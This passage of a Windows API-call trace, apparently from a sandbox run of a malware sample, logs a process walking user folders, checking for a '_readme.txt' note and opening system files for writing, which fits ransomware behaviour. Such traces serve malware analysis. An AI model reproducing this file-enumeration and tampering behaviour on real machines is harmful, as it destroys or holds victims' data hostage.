lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.074] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0201.074] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0201.074] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.074] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.074] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.074] PathFindFileNameW (pszPath="") returned="" [0201.074] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.386] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.387] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0201.387] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0201.387] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0201.387] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0201.387] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0201.388] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0201.388] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.390] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.390] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0201.390] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0201.390] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.390] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.390] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.390] PathFindFileNameW (pszPath="") returned="" [0201.390] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.392] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.392] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0201.392] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0201.392] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0201.392] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0201.392] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0201.392] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0201.392] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0201.392] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.393] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.393] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0201.394] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0201.394] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.394] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.394] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.394] PathFindFileNameW (pszPath="") returned="" [0201.394] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.396] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.396] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0201.396] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0201.396] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0201.396] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.397] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.397] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\") returned="8522zzaC3XYMo_\\" [0201.397] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0201.398] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.398] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.398] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.398] PathFindFileNameW (pszPath="") returned="" [0201.398] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaee56e50, ftCreationTime.dwHighDateTime=0x1d5e32e, ftLastAccessTime.dwLowDateTime=0xf83bfd10, ftLastAccessTime.dwHighDateTime=0x1d5dae3, ftLastWriteTime.dwLowDateTime=0xf83bfd10, ftLastWriteTime.dwHighDateTime=0x1d5dae3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.401] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.402] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.402] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\") returned="-Na1oMmnUTFTw3KDwZd\\" [0201.402] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0201.402] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.402] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.402] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.402] PathFindFileNameW (pszPath="") returned="" [0201.402] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a4399c0, ftCreationTime.dwHighDateTime=0x1d5e37e, ftLastAccessTime.dwLowDateTime=0xb3c11810, ftLastAccessTime.dwHighDateTime=0x1d5e794, ftLastWriteTime.dwLowDateTime=0xb3c11810, ftLastWriteTime.dwHighDateTime=0x1d5e794, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.405] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.406] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.406] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\") returned="biDMIzVx5WSAFsePg\\" [0201.406] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0201.406] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.406] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.406] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.406] PathFindFileNameW (pszPath="") returned="" [0201.406] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x188398a0, ftCreationTime.dwHighDateTime=0x1d5da1a, ftLastAccessTime.dwLowDateTime=0x9f6ccd0, ftLastAccessTime.dwHighDateTime=0x1d5db55, ftLastWriteTime.dwLowDateTime=0x9f6ccd0, ftLastWriteTime.dwHighDateTime=0x1d5db55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.407] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.408] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.408] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\") returned="ee2U4KlmK-3zpwEnEyLp\\" [0201.408] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0201.408] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.408] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.408] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.408] PathFindFileNameW (pszPath="") returned="" [0201.408] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1a57fd0, ftCreationTime.dwHighDateTime=0x1d5d7e3, ftLastAccessTime.dwLowDateTime=0xcf758270, ftLastAccessTime.dwHighDateTime=0x1d5d7cd, ftLastWriteTime.dwLowDateTime=0xcf758270, ftLastWriteTime.dwHighDateTime=0x1d5d7cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.411] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.412] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.412] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\") returned="iMNzi0f_lMj\\" [0201.412] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0201.412] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.412] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.412] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.412] PathFindFileNameW (pszPath="") returned="" [0201.412] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30afe540, ftCreationTime.dwHighDateTime=0x1d5e38f, ftLastAccessTime.dwLowDateTime=0x64cca8f0, ftLastAccessTime.dwHighDateTime=0x1d5dfb0, ftLastWriteTime.dwLowDateTime=0x64cca8f0, ftLastWriteTime.dwHighDateTime=0x1d5dfb0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.418] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.419] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.419] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.419] PathFindFileNameW (pszPath="") returned="" [0201.419] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.420] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.420] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x336f4d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.420] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.420] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0201.420] PathFileExistsW (pszPath="C:\\_readme.txt") returned 1 [0201.420] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x32ef1f8 [0201.421] PathFindExtensionW (pszPath="C:\\bootmgr") returned="" [0201.421] PathFindExtensionW (pszPath="C:\\BOOTSECT.BAK") returned=".BAK" [0201.421] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.423] PathFindExtensionW (pszPath="C:\\hiberfil.sys") returned=".sys" [0201.423] PathFindExtensionW (pszPath="C:\\pagefile.sys") returned=".sys" [0201.423] PathFindExtensionW (pszPath="C:\\_readme.txt") returned=".txt" [0201.423] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.423] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.424] RtlAllocateHeap (HeapHandle=0x2c0000, 